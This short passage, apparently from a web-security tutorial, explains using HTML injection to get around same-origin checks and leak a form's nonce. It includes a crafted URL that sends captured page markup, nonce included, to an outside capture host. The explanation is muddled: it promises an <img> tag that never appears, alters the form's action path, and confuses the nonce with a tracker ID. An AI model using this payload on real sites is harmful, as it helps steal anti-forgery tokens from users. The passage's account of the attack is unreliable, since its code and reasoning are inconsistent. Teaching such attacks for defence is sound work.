If the same-origin policy states that all the actions need to be performed from a specific domain, we can inject HTML code into any part of the application in order to execute the actions. These HTML injections don't necessarily need to be in a vulnerable field. Sometimes, if we take a look, the injections could be in allowed places. For example, in an email, where we can add some HTML, or in a board message, where we can add HTML in a comment. Let's check out the following code to see an example:
<form action="http://www.testsite.com/action.php" method="POST"> <input type="hidden" name="nonce" value="2230313740821"> <input type="submit" value="Forward"> ... </form> ... <script> var _StatsTrackerId='AABBCCDDEEFF; ... </script>
If we have this vulnerable form, we can try to create an HTML injection by using the <img> tag to add the attack, for example:
http://othersite.net/capture?html=<form%20action="http://www.testsite.com/faction.php"%20method="POST"><input%20type="hidden"%20name="nonce"%20value= "AABBCCDDEEFF"><input%20type="submit"%20value="Forward">...</form>...<script> var%20_StatsTrackerId=
If the application tries to validate the domain, it will be correct, because the request is generated from othersite.net, but the real request is to testsite.com.